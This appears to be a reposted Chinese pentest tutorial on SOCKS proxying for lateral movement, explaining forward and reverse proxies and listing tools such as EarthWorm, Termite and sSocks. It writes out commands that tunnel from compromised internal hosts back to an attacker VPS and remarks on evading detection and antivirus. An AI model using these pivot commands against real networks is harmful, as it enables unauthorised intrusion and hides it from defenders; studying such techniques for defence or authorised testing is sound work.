17.socks代理(概述、ew和Termite、ssocks)


一、socks代理概述

 

 

1、代理的使用情况:

某些特殊区域的机器不能直接被外网的机器或者是某台机器访问,那么我们就需要把那些机器作为一个代理服务器,建立代理服务,我们就可以通过这个代理服务去访问特殊区域的机器了。

至于为什么不直接登录到那台机器上操作,一因为容易被发现,二是工具不好传上去。不使用端口转发的原因是,端口转发只能转发一个端口,当我们想要同时访问多个端口时,就需要建立多个转发,这样一来进程就很多了,而且访问不同的端口还要考验我们的记忆力,极其不便。

 

2、代理的两种方式:

代理分为正向代理和反向代理,不同的代理适用于不同的场景

 

 

 

 

 

3、正向代理:

正向代理就是在已控制的机器上面开一个端口,用来建立代理服务,然后我们直接去连接使用开放出来的端口。

 

4、正向代理的工具:

①  Windows

Ⅰ  Earthworm,简称ew

Ⅱ  Xsocks

②  Linux

Ⅰ  Proxy_s5    raw.githubusercontent.com

Ⅱ  Xsocks

 

5、反向代理

反向代理就是我们控制的机器在内网或者是开了防火墙,导致我们不能直接连进去,只能让受控机器先主动跟我们的VPS建立连接,然后我们再通过VPS与之通信加利利代理服务。

 

6、反向代理的工具:

①  Windows:

Ⅰ  Earthworm,简称ew

Ⅱ  Termite,ew升级版

Ⅲ  Cobalt Strike

Ⅳ  Metasploit

Ⅴ  sSocks【Windows版】

Ⅵ  ……

 

②  Linux:

Ⅰ  Earthworm,简称ew

Ⅱ  Termite,ew升级版

Ⅲ  sSocks  https://github.com/tostercx/ssocks

Ⅳ  Metasploit

Ⅴ  ……

 

③  Web:

Ⅰ  reGeorg

Ⅱ  ……

 

 

二、ew和Termite的使用

 

 

1、ew和Termite:

优点在于功能强大,但缺点也都一样,被杀,由于有着强大的功能,被业内各类安全人员使用,就免不了被杀的命运,而且作者都不愿意更新并移除了下载项,也不愿意开放源代码。

Ew:http://rootkiter.com/EarthWorm/

Termite:http://rootkiter.com/Termite/

 

2、二重内网环境中的ew代理利用:

 

VPS(192.168.100.50):

ew_for_win_32.exe -s lcx_listen -l 1080 -e 8888    //监听vps的8888端口,并将监听到的内容转到1080端口

FTP(192.168.1.4):

ew_for_win_32.exe -s ssocksd -l 9999    //FTP上开启9999端口

WEB(192.168.1.128):

ew_for_win_32.exe -s lcx_slane -d 192.168.100.50 -e 8888 -f 192.168.1.4 -g 9999    //将FTP上刚刚开启的9999端口转到VPS的8888端口

 

接下来我们回到Hacker本机,用proxifier连接到VPS的1080端口即可。

 

3、二重内网环境中的ew代理的操作过程:

 

Vps:

 

 

 

Web:

 

 

 

ftp:

 

 

 

Proxifier:

 

 

 

接下来可以在上图的“配置文件”中选择“代理规则”进行配置,代理规则其实就相当于指定那个软件的流量经过代理,哪些不经过代理,一般情况下我们需要使用浏览器访问内网的网页,所以就需要给浏览器配置经过代理,其他不需要代理的软件就这设为direct模式(不经过代理)完成后即可实现代理服务

 

这里我们在开启代理服务后,直接在vps上ping百度

 

 

 

然后我们在proxifier和ftp上能看到我们的操作,这里也说明我们成功的通过ew直接操控ftp了

 

 

 

 

 

 

4、关于Termite:

    Termite由于作者目前关闭下载渠道,因此这里就不演示了,看了下跟ew操作差不多

 

 

三、ssocks代理工具使用【正反代理】

 

 

1、ssocks代理工具的使用【正反向代理】:

该工具能够免杀一些杀软,项目地址:https://github.com/tostercx/ssocks

    下好之后里面有五个文件,一般我们用rcsoks.exe、rssocks.exe、ssocksd.exe,可以去控制台用-h参数查看使用方法。

 

2、ssocks的反向代理:

 

 

 

  实现需求:Hacker-win能够通过代理访问目标内网区域的机器

  环境分析:由于已控制的机器在目标内网,因此只能反向代理出来

 

  操作:

  ① VPS先执行:

  Rcsocks.exe -l 8080 -p 1080 -b

  

  ② 已控制的机器在执行:

  Rssocks.exe -s 2.2.2.3:8080 -b

  

  ③ 报错

  憋慌,报错是正常操作,还是可以正常使用的,很多人因为看到报错就弃用了,这也算是免杀的一个原因~

 

3、ssocks的正向代理:

  正向代理就是直接启动一个端口开启一个socks服务:

  Ssocksd.exe --port 5555 -n 127.0.0.1

 

  注意,只能使用本地环回地址连接,虽然本机IP地址是:192.168.2.7,但如果想要所有的网卡都能监听5555端口,就改成:

  Ssocksd.exe --port 5555 -b 0.0.0.0

  或者:

  Ssocksd.exe --port 5555

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM